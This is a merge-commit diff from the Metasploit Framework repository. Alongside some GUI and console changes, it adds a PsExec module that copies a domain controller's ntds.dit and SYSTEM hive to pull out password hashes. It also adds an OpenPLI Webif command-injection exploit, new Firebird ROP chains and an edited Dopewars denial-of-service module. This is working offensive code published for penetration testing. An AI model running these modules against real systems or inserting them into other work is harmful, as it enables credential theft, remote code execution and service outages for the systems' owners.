Merge branch 'master' of https://github.com/rapid7/metasploit-framework
commit
4bb64a0f41
Binary file not shown.
|
@ -15,7 +15,7 @@
|
|||
</DimensionLayout>
|
||||
<DimensionLayout dim="1">
|
||||
<Group type="103" groupAlignment="0" attributes="0">
|
||||
<Component id="tabbedPane" alignment="1" pref="530" max="32767" attributes="0"/>
|
||||
<Component id="tabbedPane" alignment="1" pref="534" max="32767" attributes="0"/>
|
||||
</Group>
|
||||
</DimensionLayout>
|
||||
</Layout>
|
||||
|
@ -308,7 +308,7 @@
|
|||
<Property name="name" type="java.lang.String" value="credsTable" noResource="true"/>
|
||||
</Properties>
|
||||
<AuxValues>
|
||||
<AuxValue name="JavaCodeGenerator_CreateCodeCustom" type="java.lang.String" value="new MsfTable(rpcConn, new String [] {"Host", "Time", "Port", "Proto", "Sname", "Type", "User", "Pass", "Active"
 }, "creds", new String[]{"host", "time", "port", "proto", "sname", "type", "user", "pass", "active"})"/>
|
||||
<AuxValue name="JavaCodeGenerator_CreateCodeCustom" type="java.lang.String" value="new MsfTable(rpcConn, new String [] {"Host", "Updated", "Port", "Proto", "Sname", "Type", "User", "Pass", "Active"
 }, "creds", new String[]{"host", "updated_at", "port", "proto", "sname", "type", "user", "pass", "active"})"/>
|
||||
</AuxValues>
|
||||
</Component>
|
||||
</SubComponents>
|
||||
|
|
|
@ -527,8 +527,8 @@ nameloop: for (int i = 0; i < names.length; i++) {
|
|||
lootsTable = new MsfTable(rpcConn,new String [] {"Host", "Service", "Ltype", "Ctype", "Data", "Created", "Updated", "Name", "Info"
|
||||
}, "loots", new String[]{"host", "service", "ltype", "ctype", "data", "created_at", "updated_at", "name", "info"});
|
||||
credsPane = new javax.swing.JScrollPane();
|
||||
credsTable = new MsfTable(rpcConn, new String [] {"Host", "Time", "Port", "Proto", "Sname", "Type", "User", "Pass", "Active"
|
||||
}, "creds", new String[]{"host", "time", "port", "proto", "sname", "type", "user", "pass", "active"});
|
||||
credsTable = new MsfTable(rpcConn, new String [] {"Host", "Updated", "Port", "Proto", "Sname", "Type", "User", "Pass", "Active"
|
||||
}, "creds", new String[]{"host", "updated_at", "port", "proto", "sname", "type", "user", "pass", "active"});
|
||||
menuBar = new javax.swing.JMenuBar();
|
||||
javax.swing.JMenu fileMenu = new javax.swing.JMenu();
|
||||
connectRpcMenuItem = new javax.swing.JMenuItem();
|
||||
|
@ -710,7 +710,7 @@ nameloop: for (int i = 0; i < names.length; i++) {
|
|||
);
|
||||
mainPanelLayout.setVerticalGroup(
|
||||
mainPanelLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
|
||||
.addComponent(tabbedPane, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, 530, Short.MAX_VALUE)
|
||||
.addComponent(tabbedPane, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, 534, Short.MAX_VALUE)
|
||||
);
|
||||
|
||||
menuBar.setName("menuBar"); // NOI18N
|
||||
|
|
|
@ -156,7 +156,7 @@ module Auxiliary::Web
|
|||
end
|
||||
|
||||
def log_fingerprint( opts = {} )
|
||||
mode = details[:category].to_sym
|
||||
mode = name
|
||||
vhash = [target.to_url, opts[:fingerprint], mode, opts[:location]].
|
||||
map { |x| x.to_s }.join( '|' ).hash
|
||||
|
||||
|
@ -187,12 +187,12 @@ module Auxiliary::Web
|
|||
|
||||
report_web_vuln( info )
|
||||
|
||||
print_good " FOUND(#{mode.to_s.upcase}) URL(#{location})"
|
||||
print_good " FOUND(#{mode.to_s}) URL(#{location})"
|
||||
print_good " PROOF(#{opts[:fingerprint]})"
|
||||
end
|
||||
|
||||
def log_resource( opts = {} )
|
||||
mode = details[:category].to_sym
|
||||
mode = name
|
||||
vhash = [target.to_url, mode, opts[:location]].
|
||||
map { |x| x.to_s }.join( '|' ).hash
|
||||
|
||||
|
@ -221,12 +221,12 @@ module Auxiliary::Web
|
|||
|
||||
report_web_vuln( info )
|
||||
|
||||
print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})"
|
||||
print_good " VULNERABLE(#{mode.to_s}) URL(#{target.to_url})"
|
||||
print_good " PROOF(#{opts[:location]})"
|
||||
end
|
||||
|
||||
def process_vulnerability( element, proof, opts = {} )
|
||||
mode = details[:category].to_sym
|
||||
mode = name
|
||||
vhash = [target.to_url, mode, element.altered].
|
||||
map{ |x| x.to_s }.join( '|' ).hash
|
||||
|
||||
|
@ -281,7 +281,7 @@ module Auxiliary::Web
|
|||
|
||||
report_web_vuln( info )
|
||||
|
||||
print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})" +
|
||||
print_good " VULNERABLE(#{mode.to_s}) URL(#{target.to_url})" +
|
||||
" PARAMETER(#{element.altered}) VALUES(#{element.params})"
|
||||
print_good " PROOF(#{proof})"
|
||||
end
|
||||
|
|
|
@ -118,7 +118,7 @@ class Path < Fuzzable
|
|||
end
|
||||
|
||||
def self.from_model( form )
|
||||
e = new( :action => "#{form.path}?#{form.query}", :input => inputs[0][1] )
|
||||
e = new( :action => "#{form.path}?#{form.query}", :input => form.inputs[0][1] )
|
||||
e.model = form
|
||||
e
|
||||
end
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
#
|
||||
require 'rexml/document'
|
||||
require 'rex/parser/nmap_xml'
|
||||
require 'msf/core/db_export'
|
||||
|
@ -975,8 +975,15 @@ class Db
|
|||
end
|
||||
|
||||
def cmd_loot_help
|
||||
print_line "Usage: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
|
||||
print_line "Usage: loot <options>"
|
||||
print_line " Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
|
||||
print_line " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]"
|
||||
print_line " Del: loot -d [addr1 addr2 ...]"
|
||||
print_line
|
||||
print_line " -a,--add Add loot to the list of addresses, instead of listing"
|
||||
print_line " -d,--delete Delete *all* loot matching host and type"
|
||||
print_line " -f,--file File with contents of the loot to add"
|
||||
print_line " -i,--info Info of the loot to add"
|
||||
print_line " -t <type1,type2> Search for a list of types"
|
||||
print_line " -h,--help Show this help information"
|
||||
print_line " -S,--search Search string to filter by"
|
||||
|
@ -991,15 +998,36 @@ class Db
|
|||
types = nil
|
||||
delete_count = 0
|
||||
search_term = nil
|
||||
file = nil
|
||||
name = nil
|
||||
info = nil
|
||||
|
||||
while (arg = args.shift)
|
||||
case arg
|
||||
when '-a','--add'
|
||||
mode = :add
|
||||
when '-d','--delete'
|
||||
mode = :delete
|
||||
when '-f','--file'
|
||||
filename = args.shift
|
||||
if(!filename)
|
||||
print_error("Can't make loot with no filename")
|
||||
return
|
||||
end
|
||||
if (!File.exists?(filename) or !File.readable?(filename))
|
||||
print_error("Can't read file")
|
||||
return
|
||||
end
|
||||
when '-i','--info'
|
||||
info = args.shift
|
||||
if(!info)
|
||||
print_error("Can't make loot with no info")
|
||||
return
|
||||
end
|
||||
when '-t'
|
||||
typelist = args.shift
|
||||
if(!typelist)
|
||||
print_status("Invalid type list")
|
||||
print_error("Invalid type list")
|
||||
return
|
||||
end
|
||||
types = typelist.strip().split(",")
|
||||
|
@ -1014,8 +1042,8 @@ class Db
|
|||
return
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new({
|
||||
'Header' => "Loot",
|
||||
'Columns' => [ 'host', 'service', 'type', 'name', 'content', 'info', 'path' ],
|
||||
|
@ -1024,6 +1052,32 @@ class Db
|
|||
# Sentinal value meaning all
|
||||
host_ranges.push(nil) if host_ranges.empty?
|
||||
|
||||
if mode == :add
|
||||
if info.nil?
|
||||
print_error("Info required")
|
||||
return
|
||||
end
|
||||
if filename.nil?
|
||||
print_error("Loot file required")
|
||||
return
|
||||
end
|
||||
if types.nil? or types.size != 1
|
||||
print_error("Exactly one loot type is required")
|
||||
return
|
||||
end
|
||||
type = types.first
|
||||
name = File.basename(filename)
|
||||
host_ranges.each do |range|
|
||||
range.each do |host|
|
||||
file = File.open(filename, "rb")
|
||||
contents = file.read
|
||||
lootfile = framework.db.find_or_create_loot(:type => type, :host => host,:info => info, :data => contents,:path => filename,:name => name)
|
||||
print_status "Added loot #{host}"
|
||||
end
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
each_host_range_chunk(host_ranges) do |host_search|
|
||||
framework.db.hosts(framework.db.workspace, false, host_search).each do |host|
|
||||
host.loots.each do |loot|
|
||||
|
|
|
@ -0,0 +1,270 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Exploit::Remote::SMB::Psexec
|
||||
include Msf::Exploit::Remote::SMB::Authenticated
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
# Aliases for common classes
|
||||
SIMPLE = Rex::Proto::SMB::SimpleClient
|
||||
XCEPT= Rex::Proto::SMB::Exceptions
|
||||
CONST= Rex::Proto::SMB::Constants
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'PsExec NTDS.dit And SYSTEM Hive Download Utility',
|
||||
'Description'=> %q{
|
||||
This module authenticates to an Active Directory Domain Controller and creates
|
||||
a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the
|
||||
ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM
|
||||
hive copy can be used in combination with other tools for offline extraction of AD
|
||||
password hashes. All of this is done without uploading a single binary to the
|
||||
target host.
|
||||
},
|
||||
'Author' => [
|
||||
'Royce Davis <rdavis[at]accuvant.com>' # @R3dy__
|
||||
],
|
||||
'License'=> MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'URL', 'http://sourceforge.net/projects/smbexec' ],
|
||||
[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ]
|
||||
],
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
|
||||
OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']),
|
||||
OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']),
|
||||
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
|
||||
def peer
|
||||
return "#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
|
||||
# This is the main control method
|
||||
def run
|
||||
# Initialize some variables
|
||||
text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt"
|
||||
bat = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat"
|
||||
createvsc = "vssadmin create shadow /For=%SYSTEMDRIVE%"
|
||||
@ip = datastore['RHOST']
|
||||
@smbshare = datastore['SMBSHARE']
|
||||
# Try and connect
|
||||
if connect
|
||||
#Try and authenticate with given credentials
|
||||
begin
|
||||
smb_login
|
||||
rescue StandardError => autherror
|
||||
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
||||
return
|
||||
end
|
||||
# If a VSC was specified then don't try and create one
|
||||
if datastore['VSCPATH'].length > 0
|
||||
print_status("#{peer} - Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
|
||||
vscpath = datastore['VSCPATH']
|
||||
else
|
||||
unless datastore['CREATE_NEW_VSC'] == true
|
||||
vscpath = check_vss(text, bat)
|
||||
end
|
||||
unless vscpath
|
||||
vscpath = make_volume_shadow_copy(createvsc, text, bat)
|
||||
end
|
||||
end
|
||||
if vscpath
|
||||
if copy_ntds(vscpath, text) and copy_sys_hive
|
||||
download_ntds((datastore['WINPATH'] + "\\Temp\\ntds"))
|
||||
download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys"))
|
||||
else
|
||||
print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.")
|
||||
end
|
||||
end
|
||||
cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys")
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Thids method will check if a Volume Shadow Copy already exists and use that rather
|
||||
# then creating a new one
|
||||
def check_vss(text, bat)
|
||||
begin
|
||||
print_status("#{peer} - Checking if a Volume Shadow Copy exists already.")
|
||||
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
|
||||
command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
|
||||
result = psexec(command)
|
||||
data = smb_read_file(datastore['SMBSHARE'], @ip, text)
|
||||
vscs = []
|
||||
data.each_line { |line| vscs << line if line.include?("GLOBALROOT") }
|
||||
if vscs.empty?
|
||||
print_status("#{peer} - No VSC Found.")
|
||||
return nil
|
||||
end
|
||||
vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp
|
||||
print_good("#{peer} - Volume Shadow Copy exists on #{vscpath}")
|
||||
return vscpath
|
||||
rescue StandardError => vsscheckerror
|
||||
print_error("#{peer} - Unable to determine if VSS is enabled: #{vsscheckerror}")
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Create a Volume Shadow Copy on the target host
|
||||
def make_volume_shadow_copy(createvsc, text, bat)
|
||||
begin
|
||||
#Try to create the shadow copy
|
||||
command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
|
||||
print_status("#{peer} - Creating Volume Shadow Copy")
|
||||
out = psexec(command)
|
||||
#Get path to Volume Shadow Copy
|
||||
vscpath = get_vscpath(text)
|
||||
rescue StandardError => vscerror
|
||||
print_error("#{peer} - Unable to create the Volume Shadow Copy: #{vscerror}")
|
||||
return nil
|
||||
end
|
||||
if vscpath
|
||||
print_good("#{peer} - Volume Shadow Copy created on #{vscpath}")
|
||||
return vscpath
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Copy ntds.dit from the Volume Shadow copy to the Windows Temp directory on the target host
|
||||
def copy_ntds(vscpath, text)
|
||||
begin
|
||||
ntdspath = vscpath.to_s + "\\" + datastore['WINPATH'] + "\\NTDS\\ntds.dit"
|
||||
command = "%COMSPEC% /C copy /Y \"#{ntdspath}\" %WINDIR%\\Temp\\ntds"
|
||||
run = psexec(command)
|
||||
if !check_ntds(text)
|
||||
return false
|
||||
end
|
||||
return true
|
||||
rescue StandardError => ntdscopyerror
|
||||
print_error("#{peer} - Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Checks if ntds.dit was copied to the Windows Temp directory
|
||||
def check_ntds(text)
|
||||
print_status("#{peer} - Checking if NTDS.dit was copied.")
|
||||
check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}"
|
||||
run = psexec(check)
|
||||
output = smb_read_file(@smbshare, @ip, text)
|
||||
if output.include?("ntds")
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
# Copies the SYSTEM hive file to the Temp directory on the target host
|
||||
def copy_sys_hive
|
||||
begin
|
||||
# Try to crate the sys hive copy
|
||||
command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y"
|
||||
return psexec(command)
|
||||
rescue StandardError => hiveerror
|
||||
print_error("#{peer} - Unable to copy the SYSTEM hive file: #{hiveerror}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Download the ntds.dit copy to your attacking machine
|
||||
def download_ntds(file)
|
||||
print_status("#{peer} - Downloading ntds.dit file")
|
||||
begin
|
||||
# Try to download ntds.dit
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
remotefile = simple.open("#{file}", 'rob')
|
||||
data = remotefile.read
|
||||
remotefile.close
|
||||
ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit")
|
||||
print_good("#{peer} - ntds.dit stored at #{ntds_path}")
|
||||
rescue StandardError => ntdsdownloaderror
|
||||
print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}")
|
||||
return ntdsdownloaderror
|
||||
end
|
||||
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
||||
end
|
||||
|
||||
|
||||
# Download the SYSTEM hive copy to your attacking machine
|
||||
def download_sys_hive(file)
|
||||
print_status("#{peer} - Downloading SYSTEM hive file")
|
||||
begin
|
||||
# Try to download SYSTEM hive
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
remotefile = simple.open("#{file}", 'rob')
|
||||
data = remotefile.read
|
||||
remotefile.close
|
||||
hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive")
|
||||
print_good("#{peer} - SYSTEM hive stored at #{hive_path}")
|
||||
rescue StandardError => sysdownloaderror
|
||||
print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}")
|
||||
return sysdownloaderror
|
||||
end
|
||||
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
||||
end
|
||||
|
||||
|
||||
# Gets the path to the Volume Shadow Copy
|
||||
def get_vscpath(file)
|
||||
begin
|
||||
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
|
||||
vsc = ""
|
||||
output = smb_read_file(@smbshare, @ip, file)
|
||||
output.each_line do |line|
|
||||
vsc += line if line.include?("GLOBALROOT")
|
||||
end
|
||||
return prepath + vsc.split("ShadowCopy")[1].chomp
|
||||
rescue StandardError => vscpath_error
|
||||
print_error("#{peer} - Could not determine the exact path to the VSC check your WINPATH")
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
# Removes files created during execution.
|
||||
def cleanup_after(*files)
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
print_status("#{peer} - Executing cleanup...")
|
||||
files.each do |file|
|
||||
begin
|
||||
if smb_file_exist?(file)
|
||||
smb_file_rm(file)
|
||||
end
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
|
||||
print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}")
|
||||
end
|
||||
end
|
||||
left = files.collect{ |f| smb_file_exist?(f) }
|
||||
if left.any?
|
||||
print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
|
||||
else
|
||||
print_status("#{peer} - Cleanup was successful")
|
||||
end
|
||||
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
||||
end
|
||||
|
||||
end
|
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
|
||||
serverIP = datastore['RHOST']
|
||||
if (datastore['RPORT'].o_i != 80)
|
||||
if (datastore['RPORT'].to_i != 80)
|
||||
serverIP += ":" + datastore['RPORT'].to_s
|
||||
end
|
||||
isapiURI = datastore['ISAPI']
|
||||
|
|
|
@ -16,17 +16,20 @@ class Metasploit4 < Msf::Auxiliary
|
|||
super(update_info(info,
|
||||
'Name' => 'Dopewars Denial of Service',
|
||||
'Description' => %q{
|
||||
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.
|
||||
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to
|
||||
a lack of input validation.
|
||||
},
|
||||
'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'BID', '36606' ],
|
||||
[ 'CVE', '2009-3591' ],
|
||||
]))
|
||||
[ 'OSVDB', '58884' ],
|
||||
[ 'BID', '36606' ]
|
||||
],
|
||||
'DisclosureDate' => "Oct 05 2009" ))
|
||||
|
||||
register_options([Opt::RPORT(7902),], self.class)
|
||||
register_options([Opt::RPORT(7902)], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
|
@ -44,13 +47,13 @@ class Metasploit4 < Msf::Auxiliary
|
|||
disconnect
|
||||
|
||||
print_status("Checking for success...")
|
||||
sleep 2
|
||||
select(nil, nil, nil, 2)
|
||||
begin
|
||||
connect
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Rex::ConnectionRefused
|
||||
print_good("Dopewars server succesfully shut down!")
|
||||
print_good("Dopewars server successfully shut down!")
|
||||
else
|
||||
print_error("DOS attack unsuccessful")
|
||||
ensure
|
|
@ -0,0 +1,77 @@
|
|||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'OpenPLI Webif Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command
|
||||
injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means
|
||||
that you will not see any output of your command. A ping command can be used for
|
||||
testing the vulnerability. This module has been tested in a box with the next
|
||||
features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1
|
||||
Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware
|
||||
1.06 and Web Interface 6.0.4-Expert (PLi edition).
|
||||
},
|
||||
'Author' => [ 'm-1-k-3' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '90230' ],
|
||||
[ 'BID', '57943' ],
|
||||
[ 'EDB', '24498' ],
|
||||
[ 'URL', 'http://openpli.org/wiki/Webif' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ]
|
||||
],
|
||||
'Platform' => ['unix', 'linux'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'netcat generic'
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Feb 08 2013'
|
||||
))
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{rhost}:#{rport} - Sending remote command...")
|
||||
vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
|
||||
begin
|
||||
send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri("cgi-bin", "setConfigSettings"),
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
"maxmtu" => "1500&#{payload.encoded}&"
|
||||
}
|
||||
})
|
||||
|
||||
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
|
||||
fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
|
||||
end
|
||||
end
|
||||
end
|
|
@ -48,10 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
# pivots are pointers to stack pivots
|
||||
# pivots are pointers to stack pivots of size 0x28
|
||||
[ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
|
||||
[ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
|
||||
[ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
|
||||
[ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],
|
||||
[ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -124,10 +125,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rop_chain = [
|
||||
0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe]
|
||||
0x4a86ee77, # POP ECX # RETN [icuuc30.dll]
|
||||
0x000001c0, # 0x000001c0-> ebp
|
||||
0x000001c0, # 0x000001c0-> ecx
|
||||
0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe]
|
||||
0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll]
|
||||
].pack("V*")
|
||||
when 'Windows FB 2.1.4.18393'
|
||||
rop_chain = [
|
||||
0x0042264c, # MOV EAX,EDI # RETN [fbserver.exe]
|
||||
0x4a8026e1, # POP ECX # RETN [icuuc30.dll]
|
||||
0x000001c0, # 0x000001c0-> ecx
|
||||
0x004c5499, # ADD EAX,ECX # RETN [fbserver.exe]
|
||||
0x4a847664, # XCHG EAX,ESP # RETN [icuuc30.dll]
|
||||
].pack("V*")
|
||||
when 'Debug'
|
||||
rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")
|
||||
end
|
||||
|
@ -196,7 +205,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x00577605, # POP EAX # RETN [fbserver.exe]
|
||||
0x90909090, # nop
|
||||
0x004530ce, # PUSHAD # RETN [fbserver.exe]
|
||||
].flatten.pack("V*")
|
||||
].pack("V*")
|
||||
when 'Windows FB 2.1.4.18393'
|
||||
rop_chain = [
|
||||
0x4a843429, # POP ECX # RETN [icuuc30.dll]
|
||||
0x005ca120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
|
||||
0x0055a870, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
|
||||
0x004cecf6, # XCHG EAX,ESI # RETN [fbserver.exe]
|
||||
0x004279c0, # POP EBP # RETN [fbserver.exe]
|
||||
0x0040747d, # & call esp [fbserver.exe]
|
||||
0x004ebef1, # POP EBX # RETN [fbserver.exe]
|
||||
0x00001000, # 0x00001000-> ebx
|
||||
0x4a864c5e, # POP EDX # RETN [icuuc30.dll]
|
||||
0x00001000, # 0x00001000-> edx
|
||||
0x004eaa3b, # POP ECX # RETN [fbserver.exe]
|
||||
0x00000040, # 0x00000040-> ecx
|
||||
0x4a8330a2, # POP EDI # RETN [icuuc30.dll]
|
||||
0x00423b82, # RETN (ROP NOP) [fbserver.exe]
|
||||
0x0046b5b1, # POP EAX # RETN [fbserver.exe]
|
||||
0x90909090, # nop
|
||||
0x004c8cfc, # PUSHAD # RETN [fbserver.exe]
|
||||
].pack("V*")
|
||||
when 'Debug'
|
||||
rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue